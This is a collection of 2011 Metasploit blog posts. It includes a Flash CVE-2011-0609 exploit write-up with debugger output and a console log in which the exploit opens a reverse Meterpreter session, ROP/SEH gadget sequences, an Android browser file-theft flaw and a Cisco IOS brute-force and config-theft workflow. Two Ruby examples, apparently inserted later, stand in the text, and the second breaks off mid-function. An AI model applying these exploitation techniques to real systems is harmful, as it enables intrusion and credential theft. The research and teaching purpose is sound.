146 Posts authored by: rapid7-admin

Adobe Flash CVE-2011-0609

Posted by rapid7-admin Mar 26, 2011




Recently, I spent about a week and a half working on the latest 0-day Flash vulnerability. I released a working exploit on March 22nd 2011. The original exploit was just an attempt to get something working out the door for all of our users. The first attempt left a lot to be desired. To understand the crux of this vulnerability and what needed to be done to improve the first attempt at exploiting it, I had to dig deep into ActionScript.




ActionScript is a language which is embedded into an SWF file in the form of a bytecode stream. The embedded bytecode stream is handled by the ActionScript Virtual Machine (AVM) which is tasked with verifying the bytecode and generating native code. This process is commonly referred to as JIT (Just In Time) compiling.


The cause of this specific vulnerability is a one-byte alteration (fuzzing) within an originally well-formed bytecode stream found in a file called addLabels.swf. The bytecode passes the verification process and the native code is generated and placed in VirtualAlloc()'d executable memory. The specific result of this code executing is that uninitialized memory is referenced.




  (fb4.9a0): Access violation - code c0000005 (!!! second chance !!!)
  eax=02b38c89 ebx=02b46b20 ecx=02b78040 edx=40027f2b esi=02b467c0 edi=02b5d1f0
  eip=02b7558e esp=0013e0e8 ebp=0013e180 iopl=0         nv up ei pl nz na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040202
  02b7558e 8b4a70          mov     ecx,dword ptr [edx+70h]

  0:000> dd eax+8
  02b38c91  40027f2b 21029780 0002b36d e8180000
  02b38ca1  01026d56 34800041 000263d9 08000000
  02b38cb1  0a000000 e8000000 01026d56 43800042
  02b38cc1  000263d9 05000000 0a000000 e8000000
  02b38cd1  01026d56 58800043 000263d9 0c000000
  02b38ce1  0a000000 e8000000 01026d56 7a800044
  02b38cf1  000263d9 06000000 0a000000 e8000000
  02b38d01  01026d56 9c800045 000263d9 08000000


  0:000> u eip
  02b7558e 8b4a70          mov     ecx,dword ptr [edx+70h]
  02b75591 8d559c          lea     edx,[ebp-64h]
  02b75594 89459c          mov     dword ptr [ebp-64h],eax
  02b75597 8b01            mov     eax,dword ptr [ecx]
  02b75599 52              push    edx
  02b7559a 6a00            push    0
  02b7559c 51              push    ecx
  02b7559d ffd0            call    eax




The memory being referenced is uninitialized. To control this memory, heapspraying is required. The original exploit used heapspraying within JavaScript. This worked, but it was not very reliable.




The solution was to perform the heapspray within a SWF file which loads the trigger SWF. Using from Roee Hay I was able to get some basic heapspraying accomplished. This is a lot more reliable because it is using the same heap management routines Flash uses to allocate memory. A copy of the ActionScript source code I used for this exploit can be found in the source file.




Now that I have reliable control over the uninitialized memory, what's the next task? The next task is simply constructing the memory in such a way that the call eax instruction in the JIT code executes my shellcode. This was easily done using the good old Skylined technique of using an address which doubles as a nop instruction (0x0d0d0d0d ftw!).




The next major hurdle I had to overcome was, now that I have execution control, what do I execute? While testing I was using a hardcoded payload within the ActionScript which simply executed calc.exe. This just was not going to cut it. A few initial options came to mind. I could hardcode a meterpreter payload, but this was not very dynamic at all, so I had to come up with something else. The next option I thought of was using an egghunter payload to find shellcode I could inject in some other fashion. This would work, but it really limited things to a lot of payload specifics; for example, if the hardcoded egghunter payload was for a different architecture than the targeted machine, things would blow up and break. That would be pretty tragic since all the conditions for getting a shell would be in place but everything breaks due to the dependencies of a hardcoded payload.




Finally, I came to the conclusion that I needed to find a way to dynamically read a payload using ActionScript. Now I can simply make an HTTP request for a text file and read in the ASCII hexadecimal representation of the payload. After decoding the payload it can be applied to the heapspray code, and now we have dynamic payloads in memory. W00t!




   =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
   + -- --=[ 672 exploits - 345 auxiliary
   + -- --=[ 217 payloads - 27 encoders - 8 nops
      =[ svn r12149 updated today (2011.03.26)
   msf > use exploit/windows/browser/adobe_flashplayer_avm
   msf exploit(adobe_flashplayer_avm) > set URIPATH /
   URIPATH => /
   msf exploit(adobe_flashplayer_avm) > exploit
   [*] Exploit running as background job.
   [*] Started reverse handler on

   [*] Using URL:

   msf exploit(adobe_flashplayer_avm) >

   [*]  Local IP:

   [*] Server started.
   [*] Sending Adobe Flash Player AVM Bytecode Verification Vulnerability HTML to
   [*] Sending Exploit SWF
   [*] Sending stage (749056 bytes) to
   [*] Meterpreter session 1 opened ( -> at 2011-03-26 15:23:18 -0400
   [*] Session ID 1 ( -> processing InitialAutoRunScript 'migrate -f'
   [*] Current server process: iexplore.exe (2376)
   [*] Spawning a notepad.exe host process...
   [*] Migrating into process ID 4092
   [*] New server process: notepad.exe (4092)
   msf exploit(adobe_flashplayer_avm) > sessions


   Active sessions


   Id  Type                                   Information                                                                                Connection
   --   -------                                  ----------------                                                                                ----------------
   1   meterpreter x86/win32   WXPPROSP2-001\Administrator @ WXPPROSP2-001 ->



   msf exploit(adobe_flashplayer_avm) >



That's the entire process it took to create a reliable exploit for this vulnerability. I hope you enjoy all the sessions =).

Originally Posted by hdm




Exploit reliability has been a primary goal of the Metasploit Framework since the beginning. We require all modules to be consistent, reliable, and in cases where targeting is tricky, for this to be reflected in the Exploit Rank and in the default target settings. This policy has resulted in us turning down community submissions and withholding exploits that just didn't quite make the cut for mass distribution. Over the years our core developers and contributors have amassed dozens of modules that suffer from minor flaws or require just a bit more time to get right. These modules tend to be forgotten and eventually lose compatibility with the rest of the framework.


This process is not optimal; even when a module isn't "done", it may still be useful as a proof of concept or as a starting point for another developer to bring it to the next step. A half-finished exploit still provides a level of technical insight into a vulnerability that is difficult to obtain from most public vulnerability databases.


In an effort to improve this situation, we are happy to announce the Metasploit Framework "unstable" module tree. This tree provides a place for rough cut modules and proof of concepts to be submitted, shared, and easily used by other members of the community. Once a module is improved to the point that it meets the standards for inclusion into the main tree, it will be merged over and available via the normal update mechanism. This provides a faster path for community developers to receive feedback and can serve as a reference for anyone interested in the exploit details of a flaw when no stable module is available.


To kick things off, we seeded this tree with fifteen modules from the Rapid7 module archive. Some of these exploits are nearly done, but suffer from minor issues related to automatic exploitation, or have compatibility problems with certain payloads. We hope the community finds these modules useful and submits their own "backlog" for the public to review and improve.


To use these modules, check out the new tree from Subversion and load them into the Metasploit Framework console. The simple way to do this is outlined below:



$ svn co ~/.msf3/unstable/
$ msfconsole -m ~/.msf3/unstable/



To load the unstable tree automatically on startup, enter the following commands into the msfconsole prompt.



msf> setg MsfModulePaths /home/USERNAME/.msf3/unstable/
msf> save



For developers who would like to submit modules, please create a Redmine ticket or send them via email at msfdev[at] Note that the Name field of the module should start with INCOMPLETE or UNRELIABLE depending on the status. This will indicate where it should live in the unstable tree and make it easy for folks to identify unstable modules via the standard console commands. The unstable tree is currently for modules only, but this does include Meterpreter scripts that have been ported to the new Post module format.



Originally Posted by todb




If you've been paying any attention to the open source security software space, you've probably noticed that one of our favorite tools, nmap, ships with a pretty serious scripting engine. NSE allows users to run scripted interactions on discovered services, and lately, the repository of those scripts has exploded. As of the 5.50 release of nmap, there are 177 scripts and 54 supporting libraries, covering all sorts of protocols you're likely to run into during a pen-test engagement.



In order to capitalize on this work, I put together a Metasploit mixin to make development of Metasploit-driven NSE scripts pretty easy and straightforward, as well as an example Metasploit module to test for default Oracle database credentials. You can get a hold of these with a checkout from the svn repository:



svn co msf3



Modules that include Msf::Auxiliary::Nmap will now have a few handy methods available to them; most notably, the nmap_run() and nmap_hosts() methods. The first gets a hold of the locally-installed nmap binary and module-defined arguments, and runs the prescribed nmap scan and scripts configured by the module in a consistent, platform-independent way. nmap_hosts() takes the XML log file produced by nmap_run(), parses out all the host nodes, and passes those back to the module to deal with as it will -- modules can format and display results on the console, log to the database, or perform more follow-on actions.



I'm really excited about the practical collaboration opportunities this integration creates between the nmap and Metasploit communities. If someone writes a wicked fast NSE script for doing interesting things on the network via nmap, Metasploit users can now pretty easily take advantage of the research. Metasploit has supported importing Nmap scan results for a while now, but this mechanism is more direct, more real-time, and can be more specialized to take advantage of specific NSE scripts.
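As an added stand-alone illustration (not the mixin's code or the Oracle module's), here is the parsing step the post attributes to nmap_hosts(): read an nmap XML log, walk its host nodes and pull out the per-port NSE script results so they can be logged and acted on. The XML is a constructed sample in nmap's -oX layout, and the helper names are this example's own.

```ruby
require 'rexml/document'

# Constructed sample in nmap's -oX layout (not real scan output): one host with an
# open Oracle listener and an NSE script hit, one with the port closed, one down.
SAMPLE_NMAP_XML = <<~XML
  <nmaprun scanner="nmap" args="nmap -p 1521 --script oracle-brute -oX out.xml 10.0.0.0/30" version="5.50">
    <host>
      <status state="up" reason="syn-ack"/>
      <address addr="10.0.0.1" addrtype="ipv4"/>
      <hostnames><hostname name="db1.example.test" type="PTR"/></hostnames>
      <ports>
        <port protocol="tcp" portid="1521">
          <state state="open" reason="syn-ack"/>
          <service name="oracle-tns" product="Oracle TNS Listener"/>
          <script id="oracle-brute" output="Accounts: scott:tiger - Valid credentials"/>
        </port>
      </ports>
    </host>
    <host>
      <status state="up" reason="syn-ack"/>
      <address addr="10.0.0.2" addrtype="ipv4"/>
      <ports>
        <port protocol="tcp" portid="1521">
          <state state="closed" reason="reset"/>
        </port>
      </ports>
    </host>
    <host>
      <status state="down" reason="no-response"/>
      <address addr="10.0.0.3" addrtype="ipv4"/>
    </host>
  </nmaprun>
XML

# True when nmap marked the host as responding.
def host_up?(host)
  status = host.elements['status']
  !status.nil? && status.attributes['state'] == 'up'
end

# Prefer the IPv4 address; nmap may also emit <address addrtype="mac"> entries.
def host_address(host)
  addr = host.elements["address[@addrtype='ipv4']"] || host.elements['address']
  addr && addr.attributes['addr']
end

# Addresses of every host nmap reported as up, in document order.
def nmap_up_hosts(xml)
  doc = REXML::Document.new(xml)
  doc.elements.to_a('/nmaprun/host').select { |h| host_up?(h) }.map { |h| host_address(h) }
end

# Walk /nmaprun/host as the post describes nmap_hosts() doing, and return one hash
# per (host, open port, NSE script) so a caller can log or report each finding.
# Hosts that are down and ports that are not open are skipped.
def nmap_script_findings(xml)
  doc = REXML::Document.new(xml)
  findings = []
  doc.elements.each('/nmaprun/host') do |host|
    next unless host_up?(host)
    hostname = host.elements['hostnames/hostname']
    host.elements.each('ports/port') do |port|
      state = port.elements['state']
      next unless state && state.attributes['state'] == 'open'
      port.elements.each('script') do |script|
        findings << {
          host:     host_address(host),
          hostname: hostname && hostname.attributes['name'],
          proto:    port.attributes['protocol'],
          port:     port.attributes['portid'].to_i,
          script:   script.attributes['id'],
          output:   script.attributes['output'].to_s.strip
        }
      end
    end
  end
  findings
end

# One console-style line per finding, in the shape a module would print for the user.
def format_finding(f)
  "#{f[:host]}:#{f[:port]}/#{f[:proto]} #{f[:script]}: #{f[:output]}"
end

if $PROGRAM_NAME == __FILE__
  puts "hosts up: #{nmap_up_hosts(SAMPLE_NMAP_XML).join(', ')}"
  nmap_script_findings(SAMPLE_NMAP_XML).each { |f| puts format_finding(f) }
end
```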

Originally Posted by Chris Kirsch



All Metasploit editions are seeing an update to version 3.6 today, including an enhanced command-line feature set for increased proficiency and detailed PCI reports with pass/fail information for a comprehensive view of compliance posture with PCI regulations.


Here’s an overview of what’s new:


The new Metasploit Pro Console offers powerful new features that help professional penetration testers complete their job more efficiently in their preferred environment - whether it be command line or a graphical user interface.



Metasploit Pro Console - Only available in Metasploit Pro, this console is for penetration testers who have become highly accustomed to the easy-to-use command-line interface of the Metasploit Framework, but also require the powerful automation capabilities of Metasploit Pro. With the addition of advanced network discovery, automated exploitation, evidence collection, smart brute forcing, and reporting capabilities to the existing features of the Metasploit Console, the results are immediately visible through the standard Web interface, allowing collaboration between team members using a mix of GUI and Console interfaces.


PCI Reporting - A feature only available in Metasploit Pro, which generates reports for PCI DSS compliance with pass/fail information for applicable PCI DSS requirements. The PCI standard requires both vulnerability management (11.2) and penetration tests (11.3); therefore, to facilitate compliance with requirement 11.3, Metasploit Pro now includes a detailed, actionable report on an organization’s security posture regarding requirements two, six and eight, which include password and secure systems maintenance. In addition, organizations can leverage Rapid7’s vulnerability management solution NeXpose® to comply with requirement 11.2.


Project Activity Report - A feature found in Metasploit Pro and Metasploit Express, organizations can now create a PDF report on the exact tests they run at the technical level. This enables clients of a penetration testing firm to retrace the steps that led to a successful assignment.


Asset Tagging - An advanced feature of Metasploit Pro that allows users to freely assign tags to assets based on multiple criteria such as compliance, operation workflow and team collaboration on different operational units. Tags may be used to classify assets and document security findings, with direct integration into the reporting engine. This facilitates improved project management and reporting, in particular for large penetration testing engagements.


Global Search - Found in Metasploit Pro and Metasploit Express, global search benefits users working on teams across various projects, with the ability to now search for tags, host names, IP addresses and annotations across projects and team members. This advanced search makes it easier to find information from previous projects or from other team members.


Post-Exploitation Modules - This feature, found in all Metasploit editions, includes more than a dozen modules that can be run on exploited systems to perform actions such as gathering additional information, pivoting to other networks and elevating system privileges. New post-exploitation modules can be quickly added by Rapid7 as part of the weekly product update. In addition, Metasploit Pro and Metasploit Express provide the ability to run post-exploitation modules on multiple systems simultaneously.


More exploits and auxiliary modules - Since version 3.5.1, 14 exploits and 48 additional modules have been added to the Metasploit Framework, Metasploit Express and Metasploit Pro.

If you haven't tried Metasploit Pro yet, get your free, fully featured Metasploit Pro trial.

Originally Posted by egypt




In coordination with Metasploit Express and Metasploit Pro, version 3.6 of the Metasploit Framework is now available.  Hot on the heels of 3.5.2, this release comes with 8 new exploits and 12 new auxiliaries.  A whopping 10 of those new auxiliary modules are Chris John Riley's foray into SAP, giving you the ability to extract a range of information from servers' management consoles via the SOAP interface.  This release fixes an annoying installer bug on Linux where Postgres would not automatically start on reboot. 


The feature I am most excited about is the new Post Exploitation support. I hinted at this new module type in the 3.5.2 release announcement and with 3.6, more than 20 new modules are available. Post modules are a new, more powerful, replacement for meterpreter scripts. Scripts were clearly tied to a single platform: meterpreter for Windows. With modules it is much easier to abstract common tasks into libraries for any platform that can expose a session. For example, file operations are common across all platforms -- windows/meterpreter, windows/shell, linux/shell, etc. Post modules can simply include Post::File and have access to platform-agnostic methods for interacting with the file system. In the near future, this sort of abstraction will be extended to Windows registry manipulation and service control.


Too much generality can make it difficult to access OS-level features and when you really need to get down and dirty with a session, you still can.  Post modules have a Session object exactly as meterpreter scripts did and you can still access all of the low-level methods available to it.  That means you can use railgun for performing complex system manipulation (e.g. smartlocker) when necessary.  A major benefit of Post modules is the ability to easily include other mixins from the framework.  From a user's perspective, this means more consistent reporting and option handling than are currently available with scripts. This also opens the door to local exploits for a variety of platforms, including Windows, Linux, and even Cisco IOS through SSH and Telnet sessions.


Although post modules are meant to replace meterpreter scripts, scripts are not going away any time soon. We understand that many users still rely on private scripts for their post-exploitation needs and porting all of them to the new format will take time. So while we will be favoring module contributions over scripts, that doesn't mean your private code is suddenly going to stop working.


This is an exciting release. As always, it is immediately available from the Metasploit Framework downloads page.

Originally Posted by egypt



The Metasploit Framework is more than a pile of exploits; it is a collection of tools for gaining access where none is provided and a scaffolding for building new tools.  In a few weeks I will be teaching two, one-day dojos at CanSecWest focusing on using and extending the framework.  Some of the topics we will cover are: post-exploitation automation including meterpreter and cmd/sh shell sessions, no-exploit pwnage using stolen credentials of various types, and building your own scanners, bruteforce modules and plugins.  If you use Metasploit regularly but never felt like you could dig into the code and make it do new and awesome things, this is the class for you.  If you spend a lot of time writing one-off scripts to solve problems on a pentest, this class is for you.  If you have played with Metasploit but never used it to its full potential, this class is for you.


People have told me they don't have the necessary programming experience to get their hands dirty with Metasploit's code or that they use another language and "don't know Ruby." Without getting into the scripting-language holy wars, Ruby is very easy to learn. Don't be intimidated, programming for the Metasploit Framework is easy. The amount of programming knowledge needed to write modules is well within the grasp of most pentesters and anyone with exploit-development skills or other programming experience will be able to hit the ground running. When you have an idea for an awesome tool, or for improving the way it works, don't wait for someone else to do it. Take this class to learn how to mold the Framework to suit your needs.


If this sounds like something you're interested in, please sign up: Monday, March 7th or Tuesday, March 8th.

Originally Posted by egypt




On February 1st, Eduardo Prado of Secumania notified us of a privilege escalation vulnerability on multi-user Windows installations of the Metasploit Framework.  The problem was due to inherited permissions that allowed an unprivileged user to write files in the Metasploit installation directory.  Today we are releasing version 3.5.2 to fix this vulnerability.  The new installers fix this issue through two changes: first, we've moved the default installation to %ProgramFiles%, which does not normally allow non-admin write access; second, we explicitly remove any inherited permissions for the "Users" and "Authenticated Users" groups.  For users who prefer not to re-install Metasploit, you can use the following commands to fix the problem:


Vista and newer:


icacls c:\framework /inheritance:d /t
icacls c:\framework /remove *S-1-5-32-545 /t
icacls c:\framework /remove *S-1-5-11 /t


For systems older than Vista, you will need the xcacls.vbs tool available from Microsoft:


xcacls.vbs c:\framework /E /R SID#S-1-5-32-545 /T

Note that the "Authenticated Users" group doesn't exist before Vista, so you only need to remove "Users".


This issue is mitigated by the fact that it only affects multi-user Windows installations with low-privileged accounts, a scenario we believe to be a small percentage of our users.


In addition to fixing this vulnerability, the 3.5.2 release fixes over 50 bugs and contains 39 new modules.  Also included in this release is a revamped WMAP courtesy of Efrain Torres, improvements to Meterpreter's railgun extension thanks to chao-mu, and a fledgling version of Post Exploitation modules (a more powerful replacement for Meterpreter scripts). Raphael Mudge's Armitage was also integrated in this release. Post modules are still in their infancy and will likely be much improved in the next release.

Originally Posted by jduck



In the final days of 2010, an exploit for the Windows CreateSizedDIBSECTION vulnerability was added to the Metasploit trunk. The trigger bitmap was taken byte-for-byte from Moti and Xu Hao's slides from the Power of Community conference. However, the method for achieving code execution on Windows XP was slightly different.


Since this vulnerability is basically equivalent to "memcpy(stack_buffer, user_input, -1);", the most reliable road to exploitation is achieved using an SEH overwrite. Unfortunately, Windows XP SP2 and later protects all modules loaded in Explorer.exe with SafeSEH. Additionally, Windows opts in to DEP/NX for Windows Explorer by default. Therefore, both DEP and SafeSEH must be bypassed for successful exploitation.


In order to accomplish that feat, Moti and Xu Hao used the "l3codeca.acm" module. Sadly, that module didn't get loaded during my tests. I later found that it loads when determining the duration of video in the "Details" view mode. Still, relying on two different Explorer window view modes seemed like a bad idea. So I looked for another way.


After a minute or so, the "msacm32.drv" module gets loaded into Windows Explorer's address space. This module is presumably used for handling something to do with ACM sound, but that's largely unimportant. It does mean that this technique will only work on Windows XP machines that have a compatible sound device though. The key fact is that this module isn't protected by SafeSEH! Win! We can use any address in the code segment of this library as our fake SEH handler.


So, now the problem is how to leverage this module to kick off a ROP stage. At first I was a bit frazzled and, rather than deduce the solution logically, I used a technique I like to call trigger-fuzzing. That is, I repeatedly triggered the vulnerability with each address in the "msacm32.drv" code segment and monitored the results. After less than 512 attempts, I noticed I had a crash with EIP containing the tell-tale Rex::Text pattern.


After investigating the instruction sequence that led to EIP control, I realized the beauty of it. Trigger-fuzzing had led me to a technique that enables replacing pop/pop/ret addresses with something turning them into ROP fairly easily. The magic sauce boils down to this:



mov reg32, [esp+8]
call [reg32+off]



As you can see, this will load the address of the SEH record from the stack, then use its contents for the next gadget. As a bonus, we now have the address of the exception record in a register and can easily reference our payload (since we already know the SEH record offset in our buffer).


Of course, this isn't exactly breaking information, nor is it the only instruction sequence that will work. While chatting with Peter Van Eeckhoutte, he pointed out that a similar gadget is on the corelan wallpaper. Here are some other possible instructions that could work, just to get your creative juices flowing.



mov reg,[ebp+0c] + call [reg] (from corelan wallpaper)
mov reg, fs:[0] / ... / ret (also from corelan wallpaper)
pop regX / pop regY / pop regZ / call [regZ+8]
push regX / mov regY,[esp+0xc] / call [regY+0xc]
mov regY, [ebp+0xc] / push [regY-0x4] / ret
mov regY, fs:[0] / mov reg, [regY-0x8] / jmp reg



The question that remains -- Which sequences are most common? Is there anything as common as Pop/Pop/Ret?


PS. If you're interested in these kinds of things, we're hiring! See our previous blog post, and try not to be too intimidated :-)

Originally Posted by jduck



After the incredible success of the Metasploit Express and Metasploit Pro product launches last year, we are happy to announce a new position on the Rapid7 Metasploit team. Effective immediately, we are seeking a self-driven Exploit Engineer to join the team of full-time Metasploit developers. 


Job duties include researching vulnerabilities and writing exploit code in the form of Metasploit modules (Ruby). Exploit modules will be released to the public under the BSD open source license. 


The ideal candidate will primarily work from home, but will meet with team members approximately once a week in Austin, TX. However, exceptions may be made for the perfect candidate. Candidates must have the right to work in the United States.


Benefits include:


  • Competitive salary and bonus plan
  • Health care and medical benefits
  • Paid to contribute to an open-source project
  • Exploits publicly released under BSD license

A candidate must have a solid understanding of:


  • Common vulnerability classes
  • State-of-the-art exploitation techniques
  • Programming in Ruby, C, C++, and x86 assembly
  • Common networking protocols (TCP/IP and related protocols)
  • Network and system administration of a lab environment
  • Using debuggers and disassemblers (WinDbg, IDA Pro)
  • Binary patch diffing (BinDiff or otherwise)
  • Common operating system implementations (Windows, Linux, etc)

In addition to the requirements, we prefer candidates who have experience:


  • Developing exploits using the Metasploit Framework
  • Reverse engineering compiled applications
  • SMT/SAT solvers
  • Various run-time analysis techniques
  • Dynamic Binary Instrumentation/Translation
  • Fuzz-testing
  • Programming in other assembly languages, such as ARM, PPC, SPARC, MIPS
  • Embedded device research and exploitation

All interested parties should email their resumes to jobs[at]

Originally Posted by jduck



Back in November, Thomas Cannon brought to light an issue within the Android operating system. Specifically, he found that it was possible to obtain the contents of files on an Android device by simply persuading its owner to visit a web site under attacker control. The issue only garners a 3.5 CVSS score, yet it’s still fairly serious.


Thomas reported this issue responsibly to Google and they took it seriously. However, since then they have come back with a ridiculous remediation plan. Granted, it’s probably not entirely Google’s fault, but the overall situation looks very bleak for Android.


The problem is that Google stated that a fix will be available as part of an update to the upcoming Android 2.3. While that, in itself, may not be totally ridiculous, the reality of the situation is that Google is only one party involved in Android. There are two other groups, namely OEMs and Carriers, that must also do their part in getting the fix to users. Although Android devices are becoming increasingly functional, the security posture remains abysmal.


The security posture for desktop applications has improved vastly with all of the sand-boxing, automatic updates, and various other exploit mitigation technologies. Meanwhile, Android includes almost none of the existing security protections. In fact, mobile users are being left out in the cold, unable to get a patch for a trivially exploitable cross-zone issue. For that matter, they can’t even control whether their device’s browser automatically downloads files or not.


This situation is not news, rather it is a sad fact. It is totally unfair for end users to be left out to fend for themselves. After all, they are paying a small fortune for these devices and the service to be able to use them. Hopefully the vendors involved will wake up before a network worm outbreak occurs.


Originally, Thomas disclosed the details of his bug on his blog. Later, he removed some details to help protect users. I believe that responsible disclosure is a two-way street that requires responsibility on both sides. Since Google, OEMs, and carriers all continue to act irresponsibly, it is necessary to bring more attention to this issue and the situation as a whole.


I spent a little time and managed to recreate the issue with nothing more than HTML and JavaScript. As of today, I have released a Metasploit module to take advantage of the flaw. It is available in the latest copy of our Framework product, or you can view the source via the link to our Redmine project tracker above.


Before I go deeper into the consequence of this bug, I want to point out that Thomas outlined several workarounds for this vulnerability in his blog.


Now, take a deep breath and give some thanks to the fact that, under Android, most every process runs under a separate, confined, unix-style user account. This design feature partially mitigates this issue, lowering confidentiality impact to “Partial” and bringing the CVSS score from 5 to 3.5. That said, an attacker can still gain access to some pretty interesting stuff.


For starters, an attacker can steal any world-readable file. In my tests it was possible to get potentially sensitive information from within the “proc” file system. This type of information could include kernel versions, addresses, or configuration that can be used to enhance further attacks.


Also, you can snarf any files that are used by the browser itself. This includes bookmarks, history, and likely more. This kind of information could potentially be embarrassing or possibly even give an attacker access to any saved passwords or session cookies you might have stored.


Perhaps the easiest win though, is that you can grab anything off of the SD card. You might ask, “Anything?! What about the user separation?” Well, because the SD card has been formatted with the “vfat” (aka “fat32”) file system, there is no concept of ownership. All files are owned by the same user id since the file system itself cannot encapsulate who created which file. As Thomas said, files in the SD card that have predictable names are ripe for the picking. This includes pictures and movies. These may in fact be some of the most private data on your device.


In conclusion, I hope that the Android security debacle will get resolved as soon as possible. If Google, OEMs, and carriers can’t work it out, perhaps another party will step in to maintain the operating system. I believe this could be very similar to the way various Linux distributions operate today. If the situation is not resolved, I fear the Android device pool could become a seething cesspool of malicious code...

Originally Posted by HD Moore



The Metasploit Framework and the commercial Metasploit products have always provided features for assessing the security of network devices. With the latest release, we took this a step further and focused on accelerating the penetration testing process for Cisco IOS devices. While the individual modules and supporting libraries were added to the open source framework, the commercial products can now chain these modules together to quickly compromise all vulnerable devices on the network. The screen shot below gives you an idea of what a successful penetration test can look like:  






To begin with, I should state that a properly configured Cisco device is a tough target to crack. Vulnerabilities exist in IOS, just like any other piece of software, but only a few folks have managed to leverage memory corruption flaws into code execution. For this reason, the majority of real-world attacks against IOS devices tend to focus on two areas: poor configuration and weak passwords. 

Before we dive into the specifics, let's review the current "state of the art" in Cisco IOS security testing. Vulnerability scanners do a great job of identifying out of date IOS installations by comparing version strings. This works well for determining whether a device is patched, but doesn't help a penetration tester who doesn't have a deep background in IOS exploitation. With few exceptions, this leaves a small number of services that are commonly exposed in production environments. These services include SNMP, Telnet, SSH, and HTTP. You may also find Finger running or relay services for media protocols like SIP and H.323. For remote access, the first four are what most of us have to work with, and even then, it's rare to find a properly configured router with any of those services exposed to the network at large.

The Cisco IOS HTTP service has a few well-known vulnerabilities on older versions of the operating system. The two we care about as penetration testers both relate to authentication bypass. The first flaw, CVE-2000-0945, relates to missing authentication in the IOS Device Manager interface. This vulnerability allows unauthenticated, often privileged access to the IOS installation through the web interface. The second vulnerability, CVE-2001-0537, allows an attacker to bypass authentication by specifying an authentication level higher than "15" in the request to the HTTP service. This also provides privileged access to the device through the web interface. The open source Metasploit Framework now provides two modules for exploiting these vulnerabilities:

1. /auxiliary/scanner/http/cisco_device_manager
2. /auxiliary/scanner/http/cisco_ios_auth_bypass


Metasploit Express and Metasploit Pro will automatically recognize Cisco IOS HTTP services during a discovery scan, check for these two flaws, and exploit them to gain access to the running device configuration. 

In addition to these two known vulnerabilities, the device password can also be determined through a brute force attack on the HTTP service. The HTTP protocol is relatively quick to brute force, compared to slower,  terminal-based services like Telnet and SSH.  Metasploit Express and Metasploit Pro will automatically grab the running device configuration after a successful HTTP brute force of an IOS device. 

The next service I want to discuss is SNMP. Oddly enough, SNMP is often left exposed on otherwise secure routers. The reason for this may be the general view of what SNMP is and does. The Simple Network Management Protocol is great for polling information across a wide range of systems in a standard format. Regardless of who built your switch or router, just about any SNMP client and monitoring software will work with that device, provided SNMP is enabled and configured. 

What many network administrators don't realize is not only the depth of information exposed by SNMP but the fact that a writeable SNMP community can be leveraged to gain complete control over a device. In the case of Cisco IOS, a writeable SNMP community can be used to download the running device configuration AND modify the running configuration. A router with telnet disabled and a complex serial password can be hijacked nearly instantly through a writeable SNMP community. The Metasploit Framework provides an SNMP brute force tool, written as an auxiliary module, which can leverage a wordlist of common passwords to identify valid communities and determine whether they are read-only or read-write. In addition to the basic brute force module, Metasploit now contains a module (submitted by community contributor "pello") that can use a writeable SNMP community to download the running device configuration.

Metasploit Express and Metasploit Pro use these two modules to automatically grab the configuration files of vulnerable devices. During a discovery scan, the SNMP brute force tool is launched in the background with a small wordlist of common communities. If any of these passwords work and the community is detected as writeable, the product will configure a local TFTP service and download the running configuration file. Since the SNMP protocol is now integrated into the intelligent brute force component of the product, the same now applies to communities guessed during a brute force run. The brute force component uses a highly tuned list of communities in addition to the dynamically generated passwords for that project. This tuned list is derived from a research project that involved scraping web forums for pasted configuration files, extracting and brute forcing the embedded passwords, and then analyzing the results to determine what passwords are most commonly used, including SNMP communities. The results of this project were surprising; I would never have guessed that "public@es0" and "private@es0" were widely used due to an example configuration included in the Cisco documentation.

The last two protocols I want to discuss are Telnet and SSH. These protocols both provide access to a remote command shell on the target device, usually as a non-privileged user. The most notable difference from a penetration testing perspective is that SSH often requires knowledge of a remote username and password, where Telnet is often configured with password-only authentication. The Metasploit Framework contains modules for brute forcing both of these protocols and will automatically create an interactive session when the brute force process succeeds.

Metasploit Express and Metasploit Pro have always supported attacks against network devices using the Telnet and SSH protocols, but with the latest release, now leverage the tuned password list from our password analytics research. This results in some unusual passwords floating to the top of the wordlist, but is extremely effective against real-world configurations. Without giving too much away, I can say that some ISPs are notorious for using static passwords to configure customer-owned equipment. 

After a session has been established through the Telnet or SSH protocols on a Cisco IOS device, the Evidence Collection feature in the commercial products will automatically grab the version information, active user list, and attempt to brute force the enable password with a list of common passwords. If the collection script is able to gain enable access, it will automatically dump additional information from the system, including the running configuration. 

The attacks listed above are not anything new. What is new is the ease with which they can be carried out using Metasploit and the ability of the commercial products to chain them together to automatically compromise vulnerable devices. These attacks are just an extension of our existing coverage and a hint of what is on the roadmap for future development of our commercial products.

One thing I haven't mentioned so far is what we actually do with the Cisco IOS configuration files after we capture them. These files contain the running configuration of the device, including the vty passwords, enable passwords, VPN keys, SSL certificates, and WiFi credentials. Metasploit will automatically parse these configuration files to scrape out sensitive data and store it as either evidence of a compromise or as stolen authentication credentials. The screen shot below demonstrates the output of brute forcing the Telnet vty password, then the enable password, then dumping and parsing the configuration:



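The same configuration files read from the defender's side: the following added example (my own code, not Metasploit's parser or any of its modules) walks a constructed IOS running-config, pulls out the credential-bearing lines the post lists (enable and vty passwords, local user accounts, SNMP communities) and flags the weak settings discussed above: read-write communities, plaintext and type 7 passwords, and an enabled HTTP management server. The sample config and all values in it are constructed.

```ruby
# Added example, not Metasploit's own parser: audit a captured Cisco IOS
# running-config for the credential-bearing lines the post describes and flag
# the weak settings it discusses. The config text is constructed for illustration.

SAMPLE_CONFIG = <<~'CFG'
  hostname branch-rtr
  enable password 7 0822455D0A16
  username admin privilege 15 password 0 ciscorules!
  username ops secret 5 $1$constructed$notarealhashvalue
  snmp-server community public RO
  snmp-server community private@es0 RW
  ip http server
  line vty 0 4
   password 7 104D000A0618
   login
  !
CFG

REVERSIBLE = { '0' => 'plaintext', '7' => 'reversible (type 7)' }.freeze

# Returns { credentials: [{kind:, type:, value:}, ...], weaknesses: [String, ...] }
def audit_ios_config(text)
  creds, weak = [], []
  section = nil # current "line vty/con/aux" block, if any

  text.each_line do |raw|
    line = raw.chomp
    if line.start_with?(' ')
      # Indented "password <type> <value>" belongs to the enclosing line block.
      if section && (m = line.strip.match(/\Apassword (\d) (\S+)/))
        creds << { kind: section, type: m[1].to_i, value: m[2] }
        weak << "#{section}: password is #{REVERSIBLE[m[1]]}" if REVERSIBLE[m[1]]
      end
      next
    end
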